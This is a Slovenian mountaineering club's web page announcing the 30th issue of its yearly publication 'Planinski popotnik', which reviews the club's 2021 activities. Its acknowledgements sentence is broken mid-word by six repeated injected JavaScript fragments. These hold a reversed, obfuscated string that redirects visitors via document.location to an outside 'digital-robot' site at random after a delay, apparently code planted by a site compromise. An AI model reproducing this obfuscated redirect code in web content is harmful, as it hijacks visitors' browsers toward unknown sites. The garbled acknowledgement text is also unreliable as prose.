IZŠEL PLANINSKI POPOTNIK ŠT. 30

Predstavljamo vam že 30. številko društvene publikacije Planinski popotnik, ki predstavlja aktivnosti našega društva v pretklem letu 2021. Na 56 straneh si lahko preberete kaj vse so v preteklem letu počeli vsi odseki ter sekcije društva, društveno statistiko, aktivnosti najmlajših, reportažo s planinskega tabora v Albaniji in Grčiji. Pogovarjali smo se z Dejanom Tajnikom, ki se aktivno ukvarja s trail tekom, spremljali naše člane, ki so osvajali 4-tisočake po Švici, osvojili najvišji vrh Hrvaške in še bi lahko naštevali. Vljudno vabljeni k branju. Planinski popotnik si lahko v elektronski obliki ogledate tukaj, če pa želite fizično obliko, jo dobite v času uradnih ur v naši društveni pisarni (vsak četrtek 18.00-20.00 na Koroški cesti 13, Šoštanj).

Velika zasluga in zahvala pri izdelavi Planinskega popotnika gre vsem avtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torjem izjemno zanimivih člankov, Jožici Andrejc za lektobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toriranje,  Občini Šoštanj za sponzoriranje stroškov pošiljanja publikacije vsem našim članom ter podjetju Media Group za oblikovanje in tiskanje.

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki